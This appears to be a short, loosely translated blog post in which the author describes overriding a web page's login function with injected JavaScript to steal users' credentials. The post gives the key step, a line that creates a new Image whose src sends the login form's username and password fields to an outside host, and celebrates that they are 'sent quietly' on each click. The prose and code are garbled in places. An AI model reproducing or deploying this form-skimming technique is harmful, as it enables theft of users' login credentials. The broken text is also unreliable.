Js Code alternative hijacking login form, js alternative hijacking form

Js Code alternative hijacking login form, js alternative hijacking form

Where is the alternative? In other words, an external js is provided on the page to hijack the login function, and I can modify the js below it (the only one, and it is useless ).

The Code in that js uses jQuery to replace the function login of the web page that is then loaded with its own function.

==========

My permissions: I can modify a js under that external js. fate, but I can do that.

--------------------------

I am very fond of js. In this case, I can make full use of it. I completely copied the js content that I can control to the external js content,

Since my js is loaded after the external js, the modified function is actually called.

Remember? The external js hijacked the login function of the web page (for the time being, it is called to replace the login function with its own A function. This has some other purposes, which makes it easier for me to copy ), this function is used to check whether the user name and password of the form are empty.

That's great. Now my js function A really replaces the login function, so I add A new Image () to function ()). src = 'HTTP: // xxx "+ document. loginForm. yh + document. loginForm. mm;

Oh, yeh. After clicking the login button, the user name and password are sent quietly.